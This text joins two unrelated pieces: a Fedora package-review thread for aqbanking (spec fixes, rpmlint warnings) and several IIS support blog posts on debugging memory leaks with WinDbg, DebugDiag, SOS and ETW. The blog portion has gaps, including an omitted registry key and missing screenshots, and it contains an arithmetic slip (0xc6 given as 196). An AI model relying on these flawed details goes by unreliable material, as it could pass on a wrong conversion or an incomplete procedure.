> > of your specfile, so the files under -python-%{name} subpackages would just go
> > into %{python_sitelib}/%{name}/
> > Is this on the wiki somewhere? I'm not finding it.
Ah. That's not actually linked anywhere from the main guidelines page. Perhaps it should be.

> ??? Why bring automake into the
> package never calls it? Seems better to have something
> else own the dir.
Wink, wink, Core dudes! ;-) The reviewing guidelines are quite explicit in this case nowadays:. But as I wrote, aqbanking-devel API users likely use automake anyway. *g*

> versioned Obsoletes
... make it less of a hassle in case you (or your fellow packagers) ever want to bring back packages with the obsolete names (and that has been a real-world scenario before, not a purely theoretical one). Admittedly, it's far from a serious issue for the "aqhbci" namespace.

(In reply to comment #7)
> ... make it less of a hassle in case you (or your fellow packagers)
> ever want to bring back packages with the obsolete names (and that
> has been a real-world scenario before, not a purely theoretical one).
Oh, I know the theory and that it happens; just not sure it will happen in this case. (Of course, if it happens with a new package, in the same namespace, with a lower version, then you get to play with epochs. Yay!)

Tweaked for the last version I could find anywhere (1.0.3). New stuff uploaded as -12.

The changes you made in the spec here,

mkdir -p $RPM_BUILD_ROOT/%{_datadir}/doc/%{name}-%{version}
mv $RPM_BUILD_ROOT/%{_datadir}/doc/{aqbanking,aqhbci} $RPM_BUILD_ROOT/%{_datadir}/doc/%{name}-%{version}

are thrown out by the %doc macro in the files section. The docs you move there are lost; I suggest you remove the %doc macro from the aqbanking files section and manually move {AUTHORS README COPYING ChangeLog} to that directory you created.

Also (not sure if this matters), somewhere in the build log there is

make[4]: Entering directory `/builddir/build/BUILD/aqbanking-2.1.0/bindings/python'
make[4]: Nothing to be done for `install-exec-am'.
./aqcodegen types.xml ../../src/libs/aqbanking/types > _aqtypes.py.tmp && \
mv _aqtypes.py.tmp _aqtypes.py || \
rm -f _aqtypes.py.tmp
Traceback (most recent call last):
  File "./aqcodegen", line 5, in <module>
    import xml.dom.ext.reader.Sax2
ImportError: No module named ext.reader.Sax2
test -z "/usr/lib/python2.5/site-packages/aqbanking" || mkdir -p -- "/var/tmp/aqbanking-2.1.0-12-root-mockbuild/usr/lib/python2.5/site-packages/aqbanking"

Fixing - the latter seems like a missing buildreq (PyXML)... are you still getting a valid python package? Fixes uploaded as -13.

You forgot to add the fixed doc directory to the file list. Adding it, and running rpmlint on the resulting packages, produces:

[deji@agape reviews]$ rpmlint aqbanking-2.1.0-13.src.rpm
W: aqbanking unversioned-explicit-obsoletes aqhbci-devel
- You forgot to version this one.
[deji@agape reviews]$ rpmlint aqbanking-2.1.0-13.x86_64.rpm
E: aqbanking obsolete-not-provided aqhbci
- aqbanking needs to also 'Provides: aqhbci'
E: aqbanking zero-length /usr/share/aqbanking/bankinfo/us/bic.idx

[deji@agape reviews]$ rpmlint aqbanking-devel-2.1.0-13.x86_64.rpm
E: aqbanking-devel obsolete-not-provided aqhbci-devel
- Also needs to be provided for.
E: aqbanking-devel zero-length usr/share/doc/aqbanking-devel-2.1.0/01-OVERVIEW
- Can be left out of the doc list.
W: qbanking no-documentation
- I believe this and the rest like it can be ignored.

[deji@agape reviews]$ rpmlint qbanking-devel-2.1.0-13.x86_64.rpm
W: qbanking-devel no-documentation
[deji@agape reviews]$ rpmlint kbanking-2.1.0-13.x86_64.rpm
W: kbanking no-documentation
[deji@agape reviews]$ rpmlint kbanking-devel-2.1.0-13.x86_64.rpm
W: kbanking-devel no-documentation
[deji@agape reviews]$ rpmlint python-aqbanking-2.1.0-13.x86_64.rpm
W: python-aqbanking no-documentation
[deji@agape reviews]$ rpmlint g2banking-devel-2.1.0-13.x86_64.rpm
W: g2banking-devel no-documentation
[deji@agape reviews]$ rpmlint g2banking-2.1.0-13.x86_64.rpm
W: g2banking no-documentation

And you really haven't fixed
> * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT
> Useless check. Nowadays buildroot cannot be "/" anymore.

. It's in FE-4. But see above.

> And you really haven't fixed
> > * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT
> > Useless check. Nowadays buildroot cannot be "/" anymore.
Fixed %install before, fixed %clean now. Uploaded as -14.

(In reply to comment #13)
> .
The way I always read Obsoletes/Provides is that it's meant for people installing the software, not programs using it. Thus, if someone doesn't know aqhbci has been obsoleted and types 'yum install aqhbci', he'll get aqbanking because of the Provides.

> Uploaded as -14.
Looks like you inadvertently use the %doc macro under the aqbanking files section again; that will clean out the directory before packaging it ;).
Just listing the directory without the %doc will do. I believe the package is OK after doing that.

Re: %doc - I've tested it; the doc build as it's there now seems to work fine for me.

I'd be happy to review this package. Here's a review:

OK - Package meets naming and packaging guidelines
OK - Spec file matches base package name.
OK - Spec has consistent macro usage.
OK - Meets Packaging Guidelines.
See below - License (GPL)
OK - License field in spec matches
See below - License file included in package
OK - Spec in American English
OK - Spec is legible.
OK - Sources match upstream md5sum:
712b21f0354d4f890a02da4f8763768b aqbanking-2.1.0.tar.gz
712b21f0354d4f890a02da4f8763768b aqbanking-2.1.0
subpackages require base package with fully versioned depend.
See below - Should have dist tag
See below - Should package latest version
3 outstanding bugs - check for outstanding bugs on package.

Issues:

1. Minor: Could include COPYING file? Also, possibly:
AUTHORS Changelog NEWS README TODO

2. Possibly a missing BuildRequires:

checking for AccountNumberCheck_new in -lktoblzcheck... no
checking ktoblzcheck.h usability... no
checking ktoblzcheck.h presence... no
checking for ktoblzcheck.h... no

4. rpmlint says:

a) E: aqbanking obsolete-not-provided aqhbci
E: aqbanking-devel obsolete-not-provided aqhbci-devel
E: qbanking obsolete-not-provided aqhbci-qt-tools
Suggest: As mentioned earlier in this review, these can probably be ignored if it's unlikely that these packages will ever come back at a later time.

c) W: g2banking no-documentation
W: g2banking-devel no-documentation
W: kbanking no-documentation
W: kbanking-devel no-documentation
W: python-aqbanking no-documentation
W: qbanking no-documentation
W: qbanking-devel no-documentation
Suggest: ignore.

5. Minor: use dist tag?

6. This is an old version... upstream is at 2.2.8. Any reason not to upgrade to that version?

7. 3 outstanding bugs, might look at the multilib conflicts and see if they are solvable at this time?
(In reply to comment #16)
> Issues:
>
> 1. Minor: Could include COPYING file? Also, possibly:
> AUTHORS Changelog NEWS README TODO
Should be in there - see the shenanigans in %install.

> 2. Possibly a missing BuildRequires:
>
> checking for AccountNumberCheck_new in -lktoblzcheck... no
> checking ktoblzcheck.h usability... no
> checking ktoblzcheck.h presence... no
> checking for ktoblzcheck.h... no
Not shipped in Core/Extras. If someone wants to maintain it, I can add a buildreq, but I'm not really interested.

>.
*shrug* We could. It's not like MP3 or something where we remove it so we're not violating any license.

> 4. rpmlint says:
..
>.
Upstream poked.

> 5. Minor: use dist tag?
It changes ABI, so it's unlikely to be rebased between releases. But it could be added if needed later.

> 6. This is an old version... upstream is at 2.2.8.
> Any reason not to upgrade to that version?
Want to get the stack reviewed, then upgrade the stack.

> 7. 3 outstanding bugs, might look at the multilib conflicts and see if they
> are solvable at this time?
205589 and 228321 are both solved in this package with the split into separate packages. 212518 will be solved with an upgrade.

1. Ah, yeah, I see all of those now except for NEWS. Not sure how useful that file is really, so it's a pretty minor item.
2. ok.
3. True, as long as nothing links to that binary library, it shouldn't matter. Can you confirm that the 'yellownet.so*' isn't linking to that binary module?
4. ok, thanks. Note that this might be fixed in an updated version already.
5. ok.
6. ok. Fair enough.
7. Excellent. Sounds good.

So, the only outstanding issues are including the NEWS file if you want, and to double-check that the yellownet.so* files are never linking against the binary-only yellow .so that's shipped with the package. I'll go ahead and APPROVE this package now. If you could check the library and address the NEWS file before importing, that would be great.
Looked at yellownet.so; it does not reference any symbols from that library. NEWS file added in CVS.

This is built now.

Package Change Request
======================
Package Name: aqbanking
New Branches: EL-4 EL-5

CVS done. BTW, there's no need to reopen bugs to make CVS requests; we only query for the flag state.
https://bugzilla.redhat.com/show_bug.cgi?id=222522
So in my previous posts, I explained how you can use the DebugDiag tool to capture high-memory dumps with leak tracking enabled, and also how to use the built-in memory analysis scripts to get a report of memory usage. In this post, I discuss how you can do things manually using Debugging Tools for Windows (Windbg). Again, I have tried to provide a generic approach, but with an example; it doesn't apply to each and every situation.

So I have a memory dump which is about 500 MB in size and was captured when web applications started throwing out-of-memory errors. The first thing to find out is where most of the memory is. I discussed this a bit in one of my earlier blog posts.

 1: 0:000> !address -summary
 2:
 3: -------------------- Usage SUMMARY --------------------------
 4:     TotSize (      KB)   Pct(Tots) Pct(Busy)   Usage
 5:     1806000 (   24600) : 01.17%    01.19%    : RegionUsageIsVAD
 6:     14f3000 (   21452) : 01.02%    00.00%    : RegionUsageFree
 7:     23e9000 (   36772) : 01.75%    01.77%    : RegionUsageImage
 8:     2200000 (   34816) : 01.66%    01.68%    : RegionUsageStack
 9:       88000 (     544) : 00.03%    00.03%    : RegionUsageTeb
10:    78c82000 ( 1978888) : 94.36%    95.34%    : RegionUsageHeap
11:           0 (       0) : 00.00%    00.00%    : RegionUsagePageHeap
12:        1000 (       4) : 00.00%    00.00%    : RegionUsagePeb
13:        1000 (       4) : 00.00%    00.00%    : RegionUsageProcessParametrs
14:        2000 (       8) : 00.00%    00.00%    : RegionUsageEnvironmentBlock
15: Tot: 7fff0000 (2097088 KB) Busy: 7eafd000 (2075636 KB)
16:
17: Largest free region: Base 57818000 - Size 00068000 (416 KB)

So from this output we can see that 94.36% of the entire virtual address space is in RegionUsageHeap, which means heap memory. We can also see the size: 1,978,888 KB, or roughly 1.88 GB! Remember, I indicated a few moments back that our dump file itself is just 500 MB in size. So what this most likely means is that this value is reserved memory vs. committed bytes, plus other information that the dump file contains.
We can also see that the largest contiguous free region is just 416 KB, which explains why this process ran into out-of-memory errors: there is just no large contiguous free block to satisfy allocation requests.

A process will have at least one heap, the default process heap, which is created for you by the operating system when the process starts. This heap is used for allocating memory if no other heaps are created and used. Components loaded within the process can create their own heaps, for example the C Runtime heap. Many of you will remember it as MSVCRT.dll, our C Runtime library.

OK, so how many heaps are there, and which heap has the most allocations? The trick I usually use is to look at all the heaps and check how many segments each heap has. I think the maximum number of segments a heap can have is 64. Segments are contiguous blocks of memory which hold smaller memory ranges of various sizes. These ranges are handed out to applications when they request memory. Thus, if a segment does not have enough memory to satisfy an allocation request, a new segment is created. The more segments there are, the higher the chances that it is our problem heap. Recommended reading.

To view the segments, you can use the built-in Windbg extension command !heap. From this example:

!heap 0

115: 02990000 <------------- Heap Handle
    Segment at 02990000 to 029d0000 (00030000 bytes committed)
    Segment at 0bc10000 to 0bd10000 (00037000 bytes committed)
    Segment at 0e350000 to 0e550000 (00007000 bytes committed)
    Segment at 15fe0000 to 163e0000 (00002000 bytes committed)
    Segment at 59530000 to 59d30000 (00001000 bytes committed)
    .
    .
    .
    Segment at 5e980000 to 5e997000 (00001000 bytes committed)
    Segment at 60040000 to 60057000 (00001000 bytes committed)
    Segment at 611e0000 to 611f7000 (00001000 bytes committed)

117: 02a10000 <------------- Heap Handle
    Segment at 02a10000 to 02a50000 (00040000 bytes committed)
    Segment at 0fc90000 to 0fd90000 (000b7000 bytes committed)
    Segment at 17640000 to 17840000 (0000e000 bytes committed)
    Segment at 21ba0000 to 21fa0000 (00001000 bytes committed)
    Segment at 58530000 to 58d30000 (00001000 bytes committed)
    Segment at 5e9c0000 to 5f9c0000 (00001000 bytes committed)
    .
    .
    .
    Segment at 7fe70000 to 7ff23000 (00001000 bytes committed)
    Segment at 23de0000 to 23e3a000 (00001000 bytes committed)
    Segment at 52770000 to 527ca000 (00001000 bytes committed)
    Segment at 52900000 to 5295b000 (00001000 bytes committed)
    Segment at 584c0000 to 5851b000 (00001000 bytes committed)
    Segment at 5a270000 to 5a2cb000 (00001000 bytes committed)

I have truncated the above entry for brevity, but essentially there were many segments. An easier way to see how many segments are in a heap is to use the !heap command again with the -s switch (for statistics) followed by the heap handle. Thus:

!heap -s 02a10000

Take a look at lines #12 & #13 in the following output.
3: 0: Heap 02a10000 4: Flags 00001003 - HEAP_NO_SERIALIZE HEAP_GROWABLE 5: Reserved memory in segments 184708 (k) 6: Commited memory in segments 18014398506966656 (k) 7: Virtual bytes (correction for large UCR) 1252 (k) 8: Free space 254 (k) (45 blocks) 9: External fragmentation 0% (45 free blocks) 10: Virtual address fragmentation 201004% (77 uncommited ranges) 11: Virtual blocks 0 - total 0 KBytes 12: Lock contention 2989 13: Segments 64 14: 896 hash table for the free list 15: Commits 0 16: Decommitts 0 17: 18: Default heap Front heap Unused bytes 19: Range (bytes) Busy Free Busy Free Total Average 20: ------------------------------------------------------------------ 21: 0 - 1024 64 142 0 0 0 0 22: 1024 - 2048 279 24 0 0 2280 8 23: 2048 - 3072 21 3 0 0 176 8 24: 3072 - 4096 2 3 0 0 16 8 25: 4096 - 5120 69 6 0 0 560 8 26: 5120 - 6144 6 0 0 0 48 8 27: 6144 - 7168 35 3 0 0 280 8 28: 7168 - 8192 0 2 0 0 0 0 29: 8192 - 9216 0 1 0 0 0 0 30: 9216 - 10240 2 1 0 0 16 8 31: 12288 - 13312 2 0 0 0 16 8 32: 13312 - 14336 0 1 0 0 0 0 33: 19456 - 20480 2 0 0 0 16 8 34: 24576 - 25600 2 0 0 0 16 8 35: 36864 - 37888 0 1 0 0 0 0 36: ------------------------------------------------------------------ 37: Total 484 187 0 0 3424 7 From the above output, you can also see the ranges of memory and their utilization. We can also obtain worst offender byte sizes and worst offender count size by using the –stat parameter of !heap command. Here’s the output. 
1: 0:000> !heap -stat -h 02a10000 2: heap @ 02a10000 3: group-by: TOTSIZE max-display: 20 4: size #blocks total ( %) (percent of total busy bytes) 5: 1008 45 - 45228 (26.78) <----------- Worst offender Bytes (WOB) 6: 19f8 21 - 358f8 (20.75) 7: 418 c6 - 32a90 (19.62) 8: 5e8 21 - c2e8 (4.72) 9: 6008 2 - c010 (4.65) 10: 5a0 21 - b9a0 (4.49) 11: 4c08 2 - 9810 (3.68) 12: 1440 6 - 7980 (2.94) 13: 808 d - 6868 (2.53) 14: 3008 2 - 6010 (2.33) 15: 2708 2 - 4e10 (1.89) 16: 1808 2 - 3010 (1.16) 17: a18 4 - 2860 (0.98) 18: 6c0 5 - 21c0 (0.82) 19: 408 6 - 1830 (0.59) 20: c08 2 - 1810 (0.58) 21: ac0 2 - 1580 (0.52) 22: a90 2 - 1520 (0.51) 23: 778 2 - ef0 (0.36) 24: 450 1 - 450 (0.10) All values are in hex in the above output except the percent column. So from the above output (line # 5) we can say that worst offender bytes [WOB - allocation size that is using the most bytes in the heap] is 0x1008 Bytes [4,104 Bytes or 4K] and it adds up to a total of 0x45228 Bytes [283,176 Bytes or 276 KB] Similarly, you could group by block size if you want to figure the worst offender count size [WOC - allocation size that has the most duplicates in the heap] and count of worst offender count by using the –grp switch. 1: 0:000> !heap -stat -h 02a10000 -grp B 3: group-by: BLOCKCOUNT max-display: 20 4: size #blocks total ( %) (percent of totalblocks) 5: 418 c6 - 32a90 (47.26) <----------- Worst offender count (WOC) 6: 1008 45 - 45228 (16.47) 7: 19f8 21 - 358f8 (7.88) 8: 5e8 21 - c2e8 (7.88) 9: 5a0 21 - b9a0 (7.88) 10: 808 d - 6868 (3.10) 11: 1440 6 - 7980 (1.43) 12: 408 6 - 1830 (1.43) 13: 6c0 5 - 21c0 (1.19) 14: a18 4 - 2860 (0.95) 15: 6008 2 - c010 (0.48) 16: 4c08 2 - 9810 (0.48) 17: 3008 2 - 6010 (0.48) 18: 2708 2 - 4e10 (0.48) 19: 1808 2 - 3010 (0.48) 20: c08 2 - 1810 (0.48) 21: ac0 2 - 1580 (0.48) 22: a90 2 - 1520 (0.48) 23: 778 2 - ef0 (0.48) 24: 450 1 - 450 (0.24) Thus in this case, the most duplicates are of allocation size 0x418 bytes [1048 Bytes] and there are 0xc6 [196] of them. 
You could also dump the allocations in the 1 KB - 4 KB range and then dump out their contents using the address value in the UserPtr column. To do that, execute: dc <address value in UserPtr column>. Warning: this command can generate a huge output, as it dumps allocations in the specified range from all heaps.

!heap -flt r 418 1008
    _HEAP @ 2a10000
      HEAP_ENTRY Size Prev Flags  UserPtr UserSize - state
        02a14a58 0084 00f0  [01]  02a14a60  00418 - (busy)
        02a15000 0084 0084  [01]  02a15008  00418 - (busy)
        02a20330 0144 0102  [01]  02a20338  00a18 - (busy)
        02a25a40 0102 0144  [01]  02a25a48  00808 - (busy)
        02a265f0 00be 0102  [01]  02a265f8  005e8 - (busy)
        02a2d1b0 00b5 00be  [01]  02a2d1b8  005a0 - (busy)
        5e9c0040 0084 00b6  [00]  5e9c0048  00418 - (free)
        7c1d0040 0084 0084  [00]  7c1d0048  00418 - (free)
        .
        .

dc 02a14a60

So that is our story so far. The next questions: what are these heaps, and who is allocating here? If you want to see the stack back trace for an allocation, you can dump out the page heap information for a given address [UserPtr]. The stack back trace is only displayed when available; if I remember correctly, it is available when page heap is enabled for the process.
0:000> !heap -p -a 7c1d0048
    address 7c1d0048 found in
    _HEAP @ 2a10000
      HEAP_ENTRY Size Prev Flags  UserPtr UserSize - state
        7c1d0040 0084 0000  [00]  7c1d0048  00418 - (free)
        Trace: 0025
        7c96d6dc ntdll!RtlDebugAllocateHeap+0x000000e1
        7c949d18 ntdll!RtlAllocateHeapSlowly+0x00000044
        7c91b298 ntdll!RtlAllocateHeap+0x00000e64
        102c103e MSVCR90D!_heap_alloc_base+0x0000005e
        102cfd76 MSVCR90D!_heap_alloc_dbg_impl+0x000001f6
        102cfb2f MSVCR90D!_nh_malloc_dbg_impl+0x0000001f
        102cfadc MSVCR90D!_nh_malloc_dbg+0x0000002c
        102db25b MSVCR90D!malloc+0x0000001b
        102bd691 MSVCR90D!operator new+0x00000011
        102bd71f MSVCR90D!operator new[]+0x0000000f
        4113d8   MyModule1!AllocateMemory+0x00000028
        41145c   MyModule1!wmain+0x0000002c
        411a08   MyModule1!__tmainCRTStartup+0x000001a8
        41184f   MyModule1!wmainCRTStartup+0x0000000f
        7c816fd7 kernel32!BaseProcessStart+0x00000023

The above output is just an example, but you get the idea of how you can use this technique to help track the source of leaks in your application.

When memory at a given address is de-allocated, the heap manager checks how many contiguous bytes are free around that address. After that check is complete, the heap manager can do one of two things: de-commit the free pages back to the operating system, or leave them committed and available on the heap's free lists. There is a registry key that controls the de-commit behavior. That key is:

For the sake of completing this blog post: adjusting the value of this registry key was the resolution in my example. It could be something else in your case, depending on the circumstances under which this occurs. Once a software developer has enough information about the pattern and source of the memory consumption, he will be able to recommend changes or make a suitable fix to resolve the issue. In this blog post, I made an attempt to show how you can track down native memory leaks manually vs. using the DebugDiag scripts discussed in this blog post. Again, this doesn't apply to every situation, as there are umpteen possibilities for the cause of a leak.
Hopefully this blog post is a good starter and a future reference.

In my last post, I discussed a generic approach to collecting memory dumps using the Debug Diagnostics tool. In this post, I discuss how to use DebugDiag's memory pressure scripts. Please note that the current version of DebugDiag does not have the ability to look at .NET heaps and draw conclusions. For .NET debugging, the best resources are the following blogs: Tess's Blog and Doug's Blog.

Step 1: Capture a high memory dump as discussed in this post.
Step 2: Start the Debug Diagnostics Tool. If prompted to select a rule, click Cancel.
Step 3: Select the Analysis tab and select the memory pressure analysis scripts.
Step 4: Add the dump files for analysis.
Step 5: Start the analysis.

Wait for DebugDiag to finish. DebugDiag will automatically connect to the Microsoft public symbol server, then download and cache symbols on your local drive for analysis. You can also add your custom symbol stores and the location where you want to cache the symbols using the Tools, Options & Settings dialog box. Have fun!

Debugging native memory leaks is one of the most difficult things to do - at least for me. There are a few Escalation Engineers at Microsoft Product Support Services who are extremely good at debugging all kinds of issues, and I learn a lot from these guys whenever I get an opportunity. In this blog post, I am not going to talk about a specific issue, but rather a general approach to debugging native memory leaks. I work in the IIS/ASP support group, and therefore some things I discuss may be more IIS/ASP specific at times. To solve common debugging issues, Escalation Engineers in the IIS support group created a fantastic tool called Debug Diagnostics Tool. This link points you to the 32-bit (x86) version. To obtain the 64-bit (x64) version, you need to call Microsoft Product Support at this time.
What this tool allows you to do is inject a module called Leaktrack.dll into the target process so that it starts collecting allocation/de-allocation information. The concept is simple: create a heap where you track allocations from the various memory managers. It works by hooking into the known Windows memory managers (NTDLL, MSVCRT, etc.).

How it works

When a module makes an allocation request, LeakTrack increments a count, records the size of the allocation, and maintains a running total of allocated bytes. When a de-allocation request is made by the same component, it decrements the count and updates the totals. For this to work effectively, you must inject LeakTrack soon after you start the process. When the process has consumed memory upwards of 700 MB, you can dump out the process and then run Debug Diag's built-in memory pressure analysis scripts against that dump file. Debug Diag is so cool that it will connect to the public Microsoft symbol server, download the symbols, analyze the dump, and create a nice report about the memory allocations and the components responsible for those allocations. It is very easy to determine issues related to memory leaks & fragmentation with the DebugDiag script. DebugDiag is very effective against issues in web applications hosted in IIS worker processes because it uses heuristics, and it is accurate most of the time.

Below are the screen shots on how to set up a leak rule in Debug Diag.

NOTE: If you are debugging a web application hosted in IIS that is leaking memory, restart IIS and send the first request to the application before you set up a memory leak rule. This starts the IIS worker process and lets you track from the beginning of the life of the process.

Step 1: Open the Debug Diagnostics Tool.
Step 2: If prompted to select a rule, select Memory & Handle Leak, OR click the Add Rule button to get to this screen.
Step 3: Click Next to get to the Select Target screen. Then select w3wp.exe if debugging an IIS process, or whichever process you wish to debug.
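Conceptually, the bookkeeping LeakTrack performs can be sketched in a few lines. This is a minimal illustrative model, not the actual implementation; the call-site names and addresses are made-up examples:

```python
from collections import defaultdict

class AllocationTracker:
    """Toy model of LeakTrack-style bookkeeping: per-call-site
    outstanding allocation counts and byte totals."""

    def __init__(self):
        self.by_site = defaultdict(lambda: [0, 0])  # site -> [count, bytes]
        self.live = {}                              # address -> (site, size)

    def on_alloc(self, address, size, site):
        # Allocation hook: bump the call site's count and byte total.
        self.by_site[site][0] += 1
        self.by_site[site][1] += size
        self.live[address] = (site, size)

    def on_free(self, address):
        # De-allocation hook: reverse the bookkeeping for that block.
        site, size = self.live.pop(address)
        self.by_site[site][0] -= 1
        self.by_site[site][1] -= size

    def worst_offenders(self):
        # Rank call sites by outstanding bytes, like the analysis report.
        return sorted(self.by_site.items(), key=lambda kv: kv[1][1], reverse=True)

t = AllocationTracker()
t.on_alloc(0x1000, 4104, "MyModule1!AllocateMemory")
t.on_alloc(0x3000, 1048, "msvcrt!malloc")
t.on_alloc(0x5000, 4104, "MyModule1!AllocateMemory")
t.on_free(0x3000)
print(t.worst_offenders()[0])  # the call site with the most outstanding bytes
```

A site whose outstanding count and byte total only ever grow over the life of the process is the classic signature of a leak, which is exactly what the analysis report surfaces.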
If you see multiple worker processes & are not sure which w3wp.exe instance to select, run the following command from a command prompt running as Administrator:

CScript %windir%\system32\iisapp.vbs

The above script will output each IIS web application pool name and its corresponding PID value, which you can use below.

Step 4: Click Next, then click on the Configure button.
Step 5: Set up the rules as follows.
Step 6: Click Save & Close, and then the Next button on the previous screen.
Step 7: Type in any name that you like for the rule, and also type in the path where you want the dumps to be generated. This drive must have lots of disk space, as each dump file will be equal to the size of the process when the dump is captured. Since we are capturing at 800 MB and upwards in this example, this will create 10 dumps (by default) of 800 MB or more each.
Step 8: Finish up the rule and activate it. Then make sure you see an information screen like the one below.

You are done! You can see the rules that you just configured in the rules window. When a dump is captured, the userdump count column will have a value of 1 or more.

Next post: using analysis scripts.

So, you have a managed dump and you want to find out the request headers. Here's one of the methods I use to find this information. I use it especially when I want to view the session ID or cookies.

String:
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=5kwvjlzd3ksgii45ephn00aq; HTTP_REFERER::6841=
Host: Skyraider
User-Agent: DebugDiag Service HTTP Pinger

Hopefully this is what you wanted.

In one of my earlier posts, I discussed one of the reasons for compression failure and how we identified it using ETW traces and resolved it. Below is the list of other reason codes for your reference.
For additional information, refer to this blog post from the IIS support team.

You may perhaps have used the Event Tracing feature of Windows, aka ETW, for debugging many server-side problems related to IIS. When I first learnt about ETW and started using it, I found it to be really cool! Unfortunately, there's not a lot of documentation around using it; for example, when to use which provider. It is helpful to know which providers emit what information, so that we can enable a specific set of providers rather than a whole bunch of them, which would generate a ton of data. Looking through lots of data can sometimes be painful. Take an example where you want to enable ETW tracing but it may take a day or two for the problem to reproduce: parsing the generated log can be a nightmare! So I decided to put together this blog post with information about some of the providers, if not all. For a list of providers available on your machine, execute the following from a command prompt:

Logman query providers

The following table lists details about the providers (that I usually use) & their trace areas (where available). Use any combination of these providers depending on what problem you are troubleshooting.

NOTE: ETW tracing is also very helpful when you want to view what is happening on the server side over an SSL connection. I already have a blog post on using ETW providers to capture data & parse ETW traces.

Windbg is a native debugger, and you can use it to set a breakpoint on a virtual address. Managed code running within the process doesn't have a virtual address associated with it until it is JIT compiled. Thus, setting a breakpoint on a managed function is a bit tricky in Windbg.
Here is how you can set a breakpoint on managed methods using Windbg alone.

When I started learning how to set managed breakpoints, one of the first questions I had was: how do you set a breakpoint on a specific line of code in a managed method? After all, that is what we usually do in IDE environments like Visual Studio. This is very difficult to do because, though you can get the virtual address where your method starts using the SOS commands, you need to know the exact offset from the method's starting virtual address [the actual address that corresponds to your line of code], and it isn't easy at all to correlate that to your source code. You need an extremely good understanding of IL code, to unassemble the function using the !u command, and then to set the breakpoint on the resulting address. I do not have that skill yet, but will surely put out a post once I figure that out. So here, I will describe how to set a breakpoint on a managed method for .NET Framework 2.0.

STEP 1: Assuming you are doing a live debug, the first step is to attach to the process that you want to debug. You can use the Attach option in the Windbg user interface [File menu]. Then load the SOS debugger extension: .loadby sos mscorwks

STEP 2: You need to know which method you want to set a breakpoint on. The SOS command you need is !dumpmt with the -md parameter. This lists out the method table.
For example, dump the method table of System.TimeSpan:

!dumpmt -md 0x7911228c
EEClass: 791121e4
Module: 790c2000
Name: System.TimeSpan
mdToken: 02000114 (C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
BaseSize: 0x10
ComponentSize: 0x0
Number of IFaces in IFaceMap: 3
Slots in VTable: 56
--------------------------------------
MethodDesc Table
   Entry MethodDesc      JIT Name
796d2710   7914fb28     NONE System.TimeSpan.ToString()
793624d0   7914b950   PreJIT System.Object.Finalize()
796c07f8   7914fb08     NONE System.TimeSpan.CompareTo(System.TimeSpan)
796d2708   7914fb18     NONE System.TimeSpan.Equals(System.TimeSpan)
79381054   79266eb8   PreJIT System.TimeSpan..ctor(Int64)
7939f058   79266ec0   PreJIT System.TimeSpan..ctor(Int32, Int32, Int32)
7939f07c   79266ed8   PreJIT System.TimeSpan.get_Ticks()
794002c8   79266ee0   PreJIT System.TimeSpan.get_Days()
794002e8   79266ee8   PreJIT System.TimeSpan.get_Hours()
79400328   79266ef0   PreJIT System.TimeSpan.get_Milliseconds()
7940036c   79266ef8   PreJIT System.TimeSpan.get_Minutes()
794003ac   79266f00   PreJIT System.TimeSpan.get_Seconds()
794003ec   79266f08   PreJIT System.TimeSpan.get_TotalDays()
7940040c   79266f10   PreJIT System.TimeSpan.get_TotalHours()
79380c10   79266f18   PreJIT System.TimeSpan.get_TotalMilliseconds()

STEP 3: [Optional] Using the method descriptor command !dumpmd, you can verify whether the code is JITted. See line #7 below. You can skip this and go to STEP 4 directly, using the corresponding MethodDesc value from the previous output.

1: !dumpmd 79266f18
2: Method Name: System.TimeSpan.get_TotalMilliseconds()
3: Class: 791121e4
4: MethodTable: 7911228c
5: mdToken: 0600101e
6: Module: 790c2000
7: IsJitted: yes
8: m_CodeOrIL: 79380c10

STEP 4: Add the breakpoint using the !bpmd -md command.
!bpmd -md 79266f18

Note that !bpmd -md takes the MethodDesc value (79266f18 in the output above), not the code address.

Another way…
Syntax: !bpmd <ModuleName> <FunctionName>
Example: !bpmd mscorlib.dll System.TimeSpan.get_TotalMilliseconds

Notes: Once your breakpoints are set, you can execute the g command to let the process run until it hits the breakpoint. Once it hits the breakpoint, you can do other tasks like examining call stacks, stack objects, local variables, etc.

Issues related to high memory utilization on an IIS application server are common. With .NET there is a little misconception that the garbage collector (GC) will clean up objects and therefore the process can never run out of memory. This isn't true: the GC will never clean up an object which is still in use. If it did, you can imagine the kind of problems that would create. While debugging memory problems, it is a good idea to capture a memory dump when the process memory consumption is at its peak. For .NET applications, a System.OutOfMemoryException is thrown when the GC fails on a VirtualAlloc(). So how do we capture a memory dump when this exception is thrown? Here's how.

For .NET Framework version 1.1:
Open the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework
Key: GCFailFastOnOOM
Type: DWORD
Value: 2

For .NET Framework version 2.0 and above:
Open the registry path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework
Key: GCBreakOnOOM
Type: DWORD
Value: 2

Setting the above key causes a DebugBreak within the process when a System.OutOfMemoryException is encountered. You can then use a tool like DebugDiag, or a debugger like WinDBG/CDB/NTSD, to capture a dump on this DebugBreak exception. The Windbg/CDB/NTSD debuggers are for advanced users; DebugDiag is generally preferred due to its ease of use, and it is designed to be used in production environments.
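For convenience, the 2.0+ setting above can also be applied by merging a .reg file like the sketch below. Remember to remove the value once you have captured your dump, since it turns every OutOfMemoryException into a debug break:

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework]
"GCBreakOnOOM"=dword:00000002
```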
Configuring Debug Diagnostic Tool

NOTE: When the dump is captured, the Userdump count column will be incremented by 1. You can then do post-mortem debugging using Windbg and SOS.

Continuing my conversations on using tools, today I want to explain how to capture an ETW trace and parse it. Event Tracing for Windows (ETW) is a very powerful tracing mechanism built into the Windows operating system that allows you to view messages from various subsystems. This is very helpful in troubleshooting problems on the server side, and we use it a lot in the IIS support group to troubleshoot various customer issues. In an earlier post, I discussed and explained the various providers in Windows that emit information. We will use some of those providers today. To view a list of providers available on your system, run the following command in a command prompt window:

Logman query providers

Stage 1: Capture an ETW trace in Windows Server 2003 with Service Pack 1 or later.

NOTE: You must be logged on as a computer administrator to perform these steps.

